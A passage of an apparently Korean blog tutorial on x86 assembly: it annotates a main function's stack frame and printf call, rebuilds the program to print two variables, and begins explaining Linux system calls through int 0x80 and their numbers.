stack\uc5d0 \uc800\uc7a5\ud568. ret\uc2dc \ud658\uc6d0\uc704\ud568<SPAN style=\"mso-spacerun: yes\">&nbsp; &nbsp;<\/SPAN><\/FONT><\/TD><\/TR>\n<TR style=\"HEIGHT: 13.5pt\" height=18>\n<TD style=\"BORDER-BOTTOM: windowtext 0.5pt solid; BORDER-LEFT: windowtext 0.5pt solid; BACKGROUND-COLOR: transparent; HEIGHT: 13.5pt; BORDER-TOP: windowtext; BORDER-RIGHT: windowtext 0.5pt solid\" class=xl24 height=18 x:str=\"movl %esp, %ebp \"><FONT size=2>movl<SPAN style=\"mso-spacerun: yes\">&nbsp; &nbsp; <\/SPAN>%esp, %ebp<SPAN style=\"mso-spacerun: yes\">&nbsp; &nbsp;<\/SPAN><\/FONT><\/TD>\n<TD style=\"BORDER-BOTTOM: windowtext 0.5pt solid; BORDER-LEFT: windowtext; BACKGROUND-COLOR: transparent; BORDER-TOP: windowtext; BORDER-RIGHT: windowtext 0.5pt solid\" class=xl24><FONT size=2>-0x04<\/FONT><\/TD>\n<TD style=\"BORDER-BOTTOM: windowtext 0.5pt solid; BORDER-LEFT: windowtext; BACKGROUND-COLOR: transparent; BORDER-TOP: windowtext; BORDER-RIGHT: windowtext 0.5pt solid\" class=xl24 x:str=\" old \"><FONT size=2><SPAN style=\"mso-spacerun: yes\">&nbsp;<\/SPAN>old<SPAN style=\"mso-spacerun: yes\">&nbsp;<\/SPAN><\/FONT><\/TD>\n<TD style=\"BORDER-BOTTOM: windowtext 0.5pt solid; BORDER-LEFT: windowtext; BACKGROUND-COLOR: transparent; BORDER-TOP: windowtext; BORDER-RIGHT: windowtext 0.5pt solid\" class=xl24 x:str=\" \ud604\uc7ac\uc758 esp\ub97c ebp\ub85c \uc124\uc815.(\ud55c \ud568\uc218\ub0b4\uc5d0\uc11c \uc77c\uc815) \"><FONT size=2><SPAN style=\"mso-spacerun: yes\">&nbsp;<\/SPAN>\ud604\uc7ac\uc758 esp\ub97c ebp\ub85c \uc124\uc815.(\ud55c \ud568\uc218\ub0b4\uc5d0\uc11c \uc77c\uc815)<SPAN style=\"mso-spacerun: yes\">&nbsp; <\/SPAN><\/FONT><\/TD><\/TR>\n<TR style=\"HEIGHT: 13.5pt\" height=18>\n<TD style=\"BORDER-BOTTOM: windowtext 0.5pt solid; BORDER-LEFT: windowtext 0.5pt solid; BACKGROUND-COLOR: transparent; HEIGHT: 13.5pt; BORDER-TOP: windowtext; BORDER-RIGHT: windowtext 0.5pt solid\" class=xl24 height=18 x:str=\"subl $4, %esp \"><FONT size=2>subl<SPAN style=\"mso-spacerun: yes\">&nbsp; &nbsp; <\/SPAN>$4, %esp<SPAN style=\"mso-spacerun: yes\">&nbsp; &nbsp; &nbsp;<\/SPAN><\/FONT><\/TD>\n<TD style=\"BORDER-BOTTOM: windowtext 0.5pt solid; BORDER-LEFT: windowtext; BACKGROUND-COLOR: transparent; BORDER-TOP: windowtext; BORDER-RIGHT: windowtext 0.5pt solid\" class=xl24><FONT size=2>-0x04<\/FONT><\/TD>\n<TD style=\"BORDER-BOTTOM: windowtext 0.5pt solid; BORDER-LEFT: windowtext; BACKGROUND-COLOR: transparent; BORDER-TOP: windowtext; BORDER-RIGHT: windowtext 0.5pt solid\" class=xl24><FONT size=2><SPAN style=\"mso-spacerun: yes\">&nbsp;<\/SPAN>0x04<\/FONT><\/TD>\n<TD style=\"BORDER-BOTTOM: windowtext 0.5pt solid; BORDER-LEFT: windowtext; BACKGROUND-COLOR: transparent; BORDER-TOP: windowtext; BORDER-RIGHT: windowtext 0.5pt solid\" class=xl24 x:str=\" \ubcc0\uc218\uac12 \uc800\uc7a5\uc744 \uc704\ud574 stack\uacf5\uac04 \ud655\ubcf4(int 4bytes) \"><FONT size=2><SPAN style=\"mso-spacerun: yes\">&nbsp;<\/SPAN>\ubcc0\uc218\uac12 \uc800\uc7a5\uc744 \uc704\ud574 stack\uacf5\uac04 \ud655\ubcf4(int 4bytes)<SPAN style=\"mso-spacerun: yes\">&nbsp;<\/SPAN><\/FONT><\/TD><\/TR>\n<TR style=\"HEIGHT: 13.5pt\" height=18>\n<TD style=\"BORDER-BOTTOM: windowtext 0.5pt solid; BORDER-LEFT: windowtext 0.5pt solid; BACKGROUND-COLOR: transparent; HEIGHT: 13.5pt; BORDER-TOP: windowtext; BORDER-RIGHT: windowtext 0.5pt solid\" class=xl24 height=18 x:str=\"movl $1, -4(%ebp) \"><FONT size=2>movl<SPAN style=\"mso-spacerun: yes\">&nbsp; &nbsp; <\/SPAN>$1, -4(%ebp)<SPAN style=\"mso-spacerun: yes\">&nbsp;<\/SPAN><\/FONT><\/TD>\n<TD style=\"BORDER-BOTTOM: windowtext 0.5pt solid; BORDER-LEFT: windowtext; BACKGROUND-COLOR: transparent; BORDER-TOP: windowtext; BORDER-RIGHT: windowtext 0.5pt solid\" class=xl24><FONT size=2>-0x08<\/FONT><\/TD>\n<TD style=\"BORDER-BOTTOM: windowtext 0.5pt solid; BORDER-LEFT: windowtext; BACKGROUND-COLOR: transparent; BORDER-TOP: windowtext; BORDER-RIGHT: windowtext 0.5pt solid\" class=xl24><FONT size=2><SPAN style=\"mso-spacerun: yes\">&nbsp;<\/SPAN>0x04<\/FONT><\/TD>\n<TD style=\"BORDER-BOTTOM: windowtext 0.5pt solid; BORDER-LEFT: windowtext; BACKGROUND-COLOR: transparent; BORDER-TOP: windowtext; BORDER-RIGHT: windowtext 0.5pt solid\" class=xl24 x:str=\" ebp\uae30\uc900 -4\ubc14\uc774\ud2b8 \uc704\uce58\uc5d0 1\uc744 \ub123\uc74c.(a=1) \"><FONT size=2><SPAN style=\"mso-spacerun: yes\">&nbsp;<\/SPAN>ebp\uae30\uc900 -4\ubc14\uc774\ud2b8 \uc704\uce58\uc5d0 1\uc744 \ub123\uc74c.(a=1)<SPAN style=\"mso-spacerun: yes\">&nbsp; &nbsp; &nbsp; &nbsp; <\/SPAN><\/FONT><\/TD><\/TR>\n<TR style=\"HEIGHT: 13.5pt\" height=18>\n<TD style=\"BORDER-BOTTOM: windowtext 0.5pt solid; BORDER-LEFT: windowtext 0.5pt solid; BACKGROUND-COLOR: transparent; HEIGHT: 13.5pt; BORDER-TOP: windowtext; BORDER-RIGHT: windowtext 0.5pt solid\" class=xl24 height=18 x:str=\"pushl -4(%ebp) \"><FONT size=2>pushl<SPAN style=\"mso-spacerun: yes\">&nbsp;&nbsp; <\/SPAN>-4(%ebp)<SPAN style=\"mso-spacerun: yes\">&nbsp; &nbsp; &nbsp;<\/SPAN><\/FONT><\/TD>\n<TD style=\"BORDER-BOTTOM: windowtext 0.5pt solid; BORDER-LEFT: windowtext; BACKGROUND-COLOR: transparent; BORDER-TOP: windowtext; BORDER-RIGHT: windowtext 0.5pt solid\" class=xl24><FONT size=2>-0x08<\/FONT><\/TD>\n<TD style=\"BORDER-BOTTOM: windowtext 0.5pt solid; BORDER-LEFT: windowtext; BACKGROUND-COLOR: transparent; BORDER-TOP: windowtext; BORDER-RIGHT: windowtext 0.5pt solid\" class=xl24><FONT size=2><SPAN style=\"mso-spacerun: yes\">&nbsp;<\/SPAN>0x04<\/FONT><\/TD>\n<TD style=\"BORDER-BOTTOM: windowtext 0.5pt solid; BORDER-LEFT: windowtext; BACKGROUND-COLOR: transparent; BORDER-TOP: windowtext; BORDER-RIGHT: windowtext 0.5pt solid\" class=xl24 x:str=\" ebp\uae30\uc900 -4\uc704\uce58\uc758 \uac12\uc744 stack\uc5d0 \ub123\uc74c \"><FONT size=2><SPAN style=\"mso-spacerun: yes\">&nbsp;<\/SPAN>ebp\uae30\uc900 -4\uc704\uce58\uc758 \uac12\uc744 stack\uc5d0 \ub123\uc74c<SPAN style=\"mso-spacerun: yes\">&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; <\/SPAN><\/FONT><\/TD><\/TR>\n<TR style=\"HEIGHT: 13.5pt\" height=18>\n<TD style=\"BORDER-BOTTOM: windowtext 0.5pt solid; BORDER-LEFT: windowtext 0.5pt solid; BACKGROUND-COLOR: transparent; HEIGHT: 13.5pt; BORDER-TOP: windowtext; BORDER-RIGHT: windowtext 0.5pt solid\" class=xl24 height=18 x:str=\"pushl $.LC0 \"><FONT size=2>pushl<SPAN style=\"mso-spacerun: yes\">&nbsp;&nbsp; <\/SPAN>$.LC0<SPAN style=\"mso-spacerun: yes\">&nbsp; &nbsp; &nbsp; &nbsp; <\/SPAN><\/FONT><\/TD>\n<TD style=\"BORDER-BOTTOM: windowtext 0.5pt solid; BORDER-LEFT: windowtext; BACKGROUND-COLOR: transparent; BORDER-TOP: windowtext; BORDER-RIGHT: windowtext 0.5pt solid\" class=xl24><FONT size=2>-0x0c<\/FONT><\/TD>\n<TD style=\"BORDER-BOTTOM: windowtext 0.5pt solid; BORDER-LEFT: windowtext; BACKGROUND-COLOR: transparent; BORDER-TOP: windowtext; BORDER-RIGHT: windowtext 0.5pt solid\" class=xl24><FONT size=2><SPAN style=\"mso-spacerun: yes\">&nbsp;<\/SPAN>0x04<\/FONT><\/TD>\n<TD style=\"BORDER-BOTTOM: windowtext 0.5pt solid; BORDER-LEFT: windowtext; BACKGROUND-COLOR: transparent; BORDER-TOP: windowtext; BORDER-RIGHT: windowtext 0.5pt solid\" class=xl24 x:str=' .LC0\uc8fc\uc18c\uac12\uc744 stack\uc5d0 \ub123\uc74c (\" a is %d \\n\") '><FONT size=2><SPAN style=\"mso-spacerun: yes\">&nbsp;<\/SPAN>.LC0\uc8fc\uc18c\uac12\uc744 stack\uc5d0 \ub123\uc74c (\" a is %d \\n\")<SPAN style=\"mso-spacerun: yes\">&nbsp; &nbsp; &nbsp;<\/SPAN><\/FONT><\/TD><\/TR>\n<TR style=\"HEIGHT: 13.5pt\" height=18>\n<TD style=\"BORDER-BOTTOM: windowtext 0.5pt solid; BORDER-LEFT: windowtext 0.5pt solid; BACKGROUND-COLOR: transparent; HEIGHT: 13.5pt; BORDER-TOP: windowtext; BORDER-RIGHT: windowtext 0.5pt solid\" class=xl24 height=18 x:str=\"call printf \"><FONT size=2>call<SPAN style=\"mso-spacerun: yes\">&nbsp; &nbsp; <\/SPAN>printf<SPAN style=\"mso-spacerun: yes\">&nbsp; &nbsp; &nbsp; &nbsp;<\/SPAN><\/FONT><\/TD>\n<TD style=\"BORDER-BOTTOM: windowtext 0.5pt solid; BORDER-LEFT: windowtext; BACKGROUND-COLOR: transparent; BORDER-TOP: windowtext; BORDER-RIGHT: windowtext 0.5pt solid\" class=xl24><FONT size=2>-0x10<\/FONT><\/TD>\n<TD style=\"BORDER-BOTTOM: windowtext 0.5pt solid; BORDER-LEFT: windowtext; BACKGROUND-COLOR: transparent; BORDER-TOP: windowtext; BORDER-RIGHT: windowtext 0.5pt solid\" class=xl24><FONT size=2><SPAN style=\"mso-spacerun: yes\">&nbsp;<\/SPAN>0x04<\/FONT><\/TD>\n<TD style=\"BORDER-BOTTOM: windowtext 0.5pt solid; BORDER-LEFT: windowtext; BACKGROUND-COLOR: transparent; BORDER-TOP: windowtext; BORDER-RIGHT: windowtext 0.5pt solid\" class=xl24 x:str=\" printf()\ud568\uc218\ub97c \ubd80\ub984 \"><FONT size=2><SPAN style=\"mso-spacerun: yes\">&nbsp;<\/SPAN>printf()\ud568\uc218\ub97c \ubd80\ub984<SPAN style=\"mso-spacerun: yes\">&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;<\/SPAN><\/FONT><\/TD><\/TR>\n<TR style=\"HEIGHT: 13.5pt\" height=18>\n<TD style=\"BORDER-BOTTOM: windowtext 0.5pt solid; BORDER-LEFT: windowtext 0.5pt solid; BACKGROUND-COLOR: transparent; HEIGHT: 13.5pt; BORDER-TOP: windowtext; BORDER-RIGHT: windowtext 0.5pt solid\" class=xl24 height=18 x:str=\"addl $8, %esp \"><FONT size=2>addl<SPAN style=\"mso-spacerun: yes\">&nbsp; &nbsp; <\/SPAN>$8, %esp<SPAN style=\"mso-spacerun: yes\">&nbsp; &nbsp; &nbsp;<\/SPAN><\/FONT><\/TD>\n<TD style=\"BORDER-BOTTOM: windowtext 0.5pt solid; BORDER-LEFT: windowtext; BACKGROUND-COLOR: transparent; BORDER-TOP: windowtext; BORDER-RIGHT: windowtext 0.5pt solid\" class=xl24><FONT size=2>-0x10<\/FONT><\/TD>\n<TD style=\"BORDER-BOTTOM: windowtext 0.5pt solid; BORDER-LEFT: windowtext; BACKGROUND-COLOR: transparent; BORDER-TOP: windowtext; BORDER-RIGHT: windowtext 0.5pt solid\" class=xl24><FONT size=2><SPAN style=\"mso-spacerun: yes\">&nbsp;<\/SPAN>0x04<\/FONT><\/TD>\n<TD style=\"BORDER-BOTTOM: windowtext 0.5pt solid; BORDER-LEFT: windowtext; BACKGROUND-COLOR: transparent; BORDER-TOP: windowtext; BORDER-RIGHT: windowtext 0.5pt solid\" class=xl24 x:str=\" esp\ub97c 8\ubc14\uc774\ud2b8 \ub354\ud568 (\ud654\uc6d0\ud568) \"><FONT size=2><SPAN style=\"mso-spacerun: yes\">&nbsp;<\/SPAN>esp\ub97c 8\ubc14\uc774\ud2b8 \ub354\ud568 (\ud654\uc6d0\ud568)<SPAN style=\"mso-spacerun: yes\">&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;<\/SPAN><\/FONT><\/TD><\/TR>\n<TR style=\"HEIGHT: 13.5pt\" height=18>\n<TD style=\"BORDER-BOTTOM: windowtext 0.5pt solid; BORDER-LEFT: windowtext 0.5pt solid; BACKGROUND-COLOR: transparent; HEIGHT: 13.5pt; BORDER-TOP: windowtext; BORDER-RIGHT: windowtext 0.5pt solid\" class=xl24 height=18 x:str=\"leave \"><FONT size=2>leave<SPAN style=\"mso-spacerun: yes\">&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; <\/SPAN><\/FONT><\/TD>\n<TD style=\"BORDER-BOTTOM: windowtext 0.5pt solid; BORDER-LEFT: windowtext; BACKGROUND-COLOR: transparent; BORDER-TOP: windowtext; BORDER-RIGHT: windowtext 0.5pt solid\" class=xl24><FONT size=2>-0x08<\/FONT><\/TD>\n<TD style=\"BORDER-BOTTOM: windowtext 0.5pt solid; BORDER-LEFT: windowtext; BACKGROUND-COLOR: transparent; BORDER-TOP: windowtext; BORDER-RIGHT: windowtext 0.5pt solid\" class=xl24><FONT size=2><SPAN style=\"mso-spacerun: yes\">&nbsp;<\/SPAN>0x04<\/FONT><\/TD>\n<TD style=\"BORDER-BOTTOM: windowtext 0.5pt solid; BORDER-LEFT: windowtext; BACKGROUND-COLOR: transparent; BORDER-TOP: windowtext; BORDER-RIGHT: windowtext 0.5pt solid\" class=xl24 x:str=\" \"><SPAN style=\"mso-spacerun: yes\"><FONT size=2>&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;<\/FONT><\/SPAN><\/TD><\/TR>\n<TR style=\"HEIGHT: 13.5pt\" height=18>\n<TD style=\"BORDER-BOTTOM: windowtext 0.5pt solid; BORDER-LEFT: windowtext 0.5pt solid; BACKGROUND-COLOR: transparent; HEIGHT: 13.5pt; BORDER-TOP: windowtext; BORDER-RIGHT: windowtext 0.5pt solid\" class=xl24 height=18 x:str=\"ret \"><FONT size=2>ret<SPAN style=\"mso-spacerun: yes\">&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; <\/SPAN><\/FONT><\/TD>\n<TD style=\"BORDER-BOTTOM: windowtext 0.5pt solid; BORDER-LEFT: windowtext; BACKGROUND-COLOR: transparent; BORDER-TOP: windowtext; BORDER-RIGHT: windowtext 0.5pt solid\" class=xl24><FONT size=2>-0x00<\/FONT><\/TD>\n<TD style=\"BORDER-BOTTOM: windowtext 0.5pt solid; BORDER-LEFT: windowtext; BACKGROUND-COLOR: transparent; BORDER-TOP: windowtext; BORDER-RIGHT: windowtext 0.5pt solid\" class=xl24 x:str=\" old \"><FONT size=2><SPAN style=\"mso-spacerun: yes\">&nbsp;<\/SPAN>old<SPAN style=\"mso-spacerun: yes\">&nbsp;<\/SPAN><\/FONT><\/TD>\n<TD style=\"BORDER-BOTTOM: windowtext 0.5pt solid; BORDER-LEFT: windowtext; BACKGROUND-COLOR: transparent; BORDER-TOP: windowtext; BORDER-RIGHT: windowtext 0.5pt solid\" class=xl24 x:str=\" \ubcf5\uadc0.(return) \"><FONT size=2><SPAN style=\"mso-spacerun: yes\">&nbsp;<\/SPAN>\ubcf5\uadc0.(return)<SPAN style=\"mso-spacerun: yes\">&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;<\/SPAN><\/FONT><\/TD><\/TR><\/TBODY><\/TABLE>\n\n<P>&nbsp;<\/P>\n<P><br \/>\uc5b4\uc148\ube14\ub9ac\uc5d0\uc11c \uac00\uc7a5 \ud63c\ub3c8\ud558\uae30 \uc26c\uc6b4 \ubd80\ubd84\uc774 stack\uc5d0 \uc313\uc774\ub294 data\uc758 \uc704\uce58\uc774\ub2e4. C\uc5b8\uc5b4\uc758 \uacbd\uc6b0\uc5d0 data\uac00 <br \/>\uc800\uc7a5\ub418\ub294 \uc808\ub300\uac12\uc744 \ud45c\uc2dc\ud558\uae30 \ub54c\ubb38\uc5d0 \uc5b4\ub824\uc6c0\uc774 \uc5c6\uc73c\ub098 \uc5b4\uc148\ube14\ub9ac\uc758 \uacbd\uc6b0\uc5d0\ub294 push, sub, add,ret\ub4f1\uc758&nbsp; <br \/>\uba85\ub839\uc5b4\ub97c \uc808\ub300\uc8fc\uc18c \uc5c6\uc774 \uc218\ud589\ud558\uc5ec\ub3c4 \uc21c\uc11c\uc5d0 \uc758\ud574 stack\uac00\uac10 \ub41c\ub2e4.&nbsp; esp\ub294 stack\uc5d0\uc11c data\uac00 \uc313\uc5ec <br \/>\uc788\ub294 \uc81c\uc77c \ub05d \uc8fc\uc18c\uc744 \ud45c\uc2dc\ud558\ubbc0\ub85c data\uc758 \uc99d\uac10\uc5d0 \ub530\ub77c esp\ub3c4 \uacc4\uc18d \ubcc0\ud558\uac8c \ub41c\ub2e4.&nbsp; data\uc758 \ucc98\ub9ac\ub294 \ub54c\ub860 <br \/>\ud2b9\uc815 \uc704\uce58\uc758 \uac12\uc744 \ucc38\uc870\ud558\uac70\ub098 \ubcc0\uacbd\uc2dc\ucf1c\uc57c \ud558\ub294 \uacbd\uc6b0\uac00 \uc788\ub294\ub370 (\uc704\uc5d0\uc11c pushl -4(%ebp) \uac19\uc740 \uacbd\uc6b0)&nbsp; <br \/>\uc774\ub7f4\ub54c \ub9e4 \uc21c\uac04 \ubcc0\ud654\ud558\ub294 esp\ub97c \uae30\uc900\uc73c\ub85c \uc0c1\ub300\uc8fc\uc18c\uac12\uc744 \uc7a1\uae30\uac00 \uc27d\uc9c0 \uc54a\ub2e4. \uadf8\ub7ec\ud55c \uc774\uc720\uc5d0\uc11c \ud55c&nbsp; <br \/>\ud568\uc218(function)\ub0b4\uc5d0\uc11c \uae30\uc900\uc5d0 \ub418\ub294 \ud55c \uc8fc\uc18c\ub97c \uc124\uc815\ud558\ub294\ub370 \uadf8\uac83\uc774 \ubc14\ub85c ebp\uc774\ub2e4. \uc704 \ub3c4\ud45c\ub97c \ubcf4\uba74 \ud568\uc218 <br \/>(main)\uc5d0 \ub4e4\uc5b4\uc640\uc11c \uccab\ubc88\uc9f8\ub85c \ud558\ub294\uacfc\uc815\uc774 \ubc14\ub85c \uc804\uc5d0 \uac00\uc9c0\uace0 \uc788\ub358 ebp\ub97c \uc800\uc7a5\ud558\uace0 \ucd08\uae30 esp\ub97c ebp\uc800\uc7a5 <br \/>\ud574\uc11c \ud568\uc218\uac00 \ub05d\ub0a0\ub54c\uae4c\uc9c0 \uc77c\uc815\ud55c \uc8fc\uc18c\uac12\uc744 \uc720\uc9c0\ud558\ub294 \uac83\uc744 \ubcfc\uc218 \uc788\ub2e4. esp\uc640 ebp\ub294 \ud558\ub098\uc758 \ud568\uc218\uac00&nbsp; <br \/>\uc2e4\ud589\ub418\uc5c8\ub2e4\uac00 \ub05d\ub098\ub294 ret \uc2ef\uc810 \uc5d0\uc11c\ub294 \ubaa8\ub450 \ucd08\uae30 \uac12\uc744 \uac16\uac8c \ub41c\ub2e4. <br \/>\ud504\ub85c\uadf8\ub7a8\uc758 \ud750\ub984\uc744 \ubcf4\uba74 ebp\ub97c \uc124\uc815\ud55c\ub4a4 a\uc758 \ubcc0\uc218\uac12\uc73c\ub85c 1\uc744 \ub123\uace0, \uadf8 a\uac12\uc744 stack\uc5d0 \uc800\uc7a5(pushl <br \/>-4(%ebp))\ud558\uace0 string \" a is %d \\n\"\uc744 stack\uc5d0 \uc800\uc7a5\ud55c \ub4a4 printf()\ud568\uc218\ub97c call\ud55c\ub2e4. \uc774\ub294 \uc6d0\ub798 <br \/>printf(\" a is %d \\n\",a);\ubcf4\uba74 \ud568\uc218\uc758 \ub9e4\uacc4\uc778\uc218\ub97c \ub4a4\ucabd\ubd80\ud130 stack\uc5d0 \ub123\ub294 \uac83\uc744 \ubcfc\uc218\uc788\ub2e4. <br \/><br \/>\uc870\uae08\ub354 \uc774\ud574\ub97c \ud558\uae30 \uc704\ud574 \uc5b4\uc0d8\ube14\ub9ac \ud504\ub85c\uadf8\ub7a8(test11.s)\uc744 \uc218\uc815\ud558\uc5ec \uc544\ub798\uc640 \uac19\uc740 C\uc5b8\uc5b4 \ud504\ub85c\uadf8\ub7a8\uc758 <br \/>\ucd9c\ub825 \uacb0\uacfc\uc640 \uac19\ub3c4\ub85d \ud574 \ubcf4\uc790..&nbsp; <br \/><br \/>--------------- C\uc5b8\uc5b4 --------------------- <br \/>&nbsp; int a=1, b=2; <br \/>&nbsp; printf(\"a=%d, b=%d \\n\",a,b); <br \/>------------------------------------------- <br \/><br \/>- \uba3c\uc800 string\ubd80\ubd84\uc740 \ubc14\uafbc\ub2e4.. \" a is %d \\n\" -&gt; \"a=%d, b=%d \\n\"&nbsp; <br \/>- ebp\ubd80\ubd84\uc740 \ubcc0\uacbd\ud560 \uac83\uc774 \uc5c6\uace0.. <br \/>- \ubcc0\uc218 \uc815\uc758 \ubd80\ubd84\uc744 \uc218\uc815\ud55c\ub2e4.&nbsp; int a (4\ubc14\uc774\ud2b8) -&gt; int a, b (8\ubc14\uc774\ud2b8) <br \/>&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;&nbsp; subl $4, %esp &nbsp; -&gt; subl $8, %esp <br \/>- a\ubcc0\uc218\uc5d0 1\uc744 \ub123\ub294\ub2e4. &nbsp; &nbsp; &nbsp; &nbsp; movl $1, -4(%ebp) <br \/>- b\ubcc0\uc218\uc5d0 2\ub97c \ub123\ub294\ub2e4. &nbsp; &nbsp; &nbsp; &nbsp; movl $2, -8(%ebp) <br \/>- b\uac12\uc744 stack\uc5d0 \ub123\ub294\ub2e4. &nbsp; &nbsp; &nbsp; pushl &nbsp; -8(%ebp) <br \/>- a\uac12\uc744 stack\uc5d0 \ub123\ub294\ub2e4. &nbsp; &nbsp; &nbsp; pushl &nbsp; -4(%ebp) <br \/>- string\ub77c\ubca8 \uc8fc\uc18c\ub97c push\ud55c\ub2e4. pushl &nbsp; $.LC0 <br \/>- call printf <br \/>- esp\uc704\uce58\ub97c \uc218\uc815. &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; addl&nbsp; $12, %esp <br \/><br \/>[willy@Null2Root] cat test12.s <br \/>.LC0: <br \/>&nbsp; &nbsp; &nbsp; &nbsp; .string \"a=%d, b=%d \\n\"&nbsp; <br \/>.globl main <br \/>main: <br \/>&nbsp; &nbsp; &nbsp; &nbsp; pushl &nbsp; %ebp &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; <br \/>&nbsp; &nbsp; &nbsp; &nbsp; movl &nbsp;&nbsp; %esp, %ebp <br \/>&nbsp; &nbsp; &nbsp; &nbsp; subl &nbsp;&nbsp; $8, %esp <br \/>&nbsp; &nbsp; &nbsp; &nbsp; movl &nbsp;&nbsp; $1, -4(%ebp) <br \/>&nbsp; &nbsp; &nbsp; &nbsp; movl &nbsp;&nbsp; $2, -8(%ebp) <br \/>&nbsp; &nbsp; &nbsp; &nbsp; pushl &nbsp; -8(%ebp) <br \/>&nbsp; &nbsp; &nbsp; &nbsp; pushl &nbsp; -4(%ebp) <br \/>&nbsp; &nbsp; &nbsp; &nbsp; pushl &nbsp; $.LC0 <br \/>&nbsp; &nbsp; &nbsp; &nbsp; call &nbsp;&nbsp; printf <br \/>&nbsp; &nbsp; &nbsp; &nbsp; addl &nbsp;&nbsp; $12, %esp <br \/>&nbsp; &nbsp; &nbsp; &nbsp; leave <br \/>&nbsp; &nbsp; &nbsp; &nbsp; ret <br \/><br \/>[willy@Null2Root]gcc test12.s -o test12 <br \/><br \/>[willy@Null2Root]$ .\/test12 <br \/>a=1, b=2&nbsp; <br \/><br \/>\uc9c0\uae08\uae4c\uc9c0 \uac04\ub2e8\ud55c \uc5b4\uc148\ube14\ub9ac \ud504\ub85c\uae00\ub7a8 \ubd84\uc11d\uc744 \ud1b5\ud558\uc5ec \uc2a4\ud14d\uc758 \uad6c\uc870\uc640 esp, ebp\uc758 \ubcc0\ud654\uc640 \uc758\ubbf8\ub97c \uc774\ud574 <br \/>\ud560\uc218 \uc788\uc5c8\ub2e4. \uc774\uc81c\ubd80\ud130\ub294 system call\ub97c \uc774\uc6a9\ud55c \ucc98\ub9ac\uc5d0 \ub300\ud558\uc5ec \uc54c\uc544\ubcf4\uc790. <br \/><br \/>&lt;\uc5b4\uc148\ube14\ub9ac\uc5d0\uc11c \uc778\ud130\ub7fd\ud2b8\uc640 system call&gt; <br \/>system call\uc774\ub780 \uc2dc\uc2a4\ud15c\uc5d0 \ubbf8\ub9ac \ub9cc\ub4e4\uc5b4 \ub193\uc740 \ub8e8\ud2f4(\ud568\uc218)\ub97c \uc774\uc6a9\ud558\uc5ec \ucc98\ub9ac\ud558\ub294 \uac83\uc744 \ub9d0\ud55c\ub2e4. \ud638\ucd9c\uc740 <br \/>interrupt\ub97c \uc774\uc6a9\ud558\uba70 Linux\uc5d0\uc11c\ub294 \uc778\ud130\ub7fd\ud2b8 0x80(int $0x80)\uc744 \uc0ac\uc6a9\ud558\ub2e4.&nbsp; system call\uc744 \ud558\ub294 \ubc29\ubc95 <br \/>\uc740 \ubbf8\ub9ac \uaddc\uc815\ub41c \ud391\uc158\ubc88\ud638\uc640 \uad00\ub828\ub41c \uc778\uc218\ub4e4\uc744 eax,ebx,ecx,edx.. \uc21c\uc73c\ub85c \ucc44\uc6cc \ub123\uc740\ub4a4 int $0x80\uc744&nbsp; <br \/>\ud568\uc73c\ub85c\uc368 \uac00\ub2a5\ud558\ub2e4. \ud568\uc218\ubc88\ud638\ub294 \ud56d\uc0c1 eax\uc5d0 \uc704\uce58\ud558\uba70 ebx\ubd80\ud130\ub294 \uc801\ub2f9\ud55c \uc778\uc218\ub4e4\uc774 \uc624\uac8c\ub41c\ub2e4.&nbsp; <br \/>Linux\uc5d0\uc11c\ub294 \/usr\/include\/asm\/unistd.h\uc5d0\uc11c system call\uad00\ub828 \ud568\uc218\ubc88\ud638\ub97c \uc815\uc758 \ud55c\ub2e4.&nbsp; \uba87\uac00\uc9c0 \ubcf4\uba74 <br \/>\ub2e4\uc74c\uacfc \uac19\ub2e4. <br \/>&nbsp; <br \/>#define __NR_exit &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; 1 <br \/>#define __NR_write &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;&nbsp; 4 <br \/>#define __NR_execve &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;&nbsp; 11 <br \/>#define __NR_setreuid &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;&nbsp; 70 <br \/>#define __NR_setregid &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;&nbsp; 71 <br \/><br \/>ebx,ecx,edx...\uc5d0 \uc5b4\ub5a4 \uac12\uc774 \ub4e4\uc5b4\uac00\ub294\uc9c0\ub294 \ud568\uc218\ubc88\ud638(eax\uc5d0 \ub4e4\uc5b4\uac00\ub294 \uac12)\uc5d0 \uc758\uc874\ud558\uc5ec \uc124\uc815\ub418\uac8c \ub418\uba70 <br \/>System Call Table(http:\/\/quaff.port5.com\/syscall_list.html)\uc744 \ucc38\uc870\ud558\uba74 \uc54c\uc218\uc788\ub2e4. \ub2e4\ub978 \ubc29\ubc95\uc73c\ub85c <br \/>C\uc5b8\uc5b4\ub85c \ud504\ub85c\uadf8\ub7a8\uc744 \ub9cc\ub4e0\ub4a4 gdb\uc5d0\uc11c disassemble\uc744 \ud1b5\ud558\uc5ec \uc54c\uc218 \uc788\ub2e4.&nbsp; <br \/><br \/>\uc774\uc81c system call\uc774\ub77c\ub294 \uac83\uc744 \uc774\ud574\ud558\uae30 \uc704\ud558\uc5ec \ub2e4\ub978 \uc608\uc81c\ub97c \ub9cc\ub4e4\uc5b4 \ubcf4\uc790. \uc544\ub798\ub294&nbsp; \"I'm Willy in&nbsp; <br 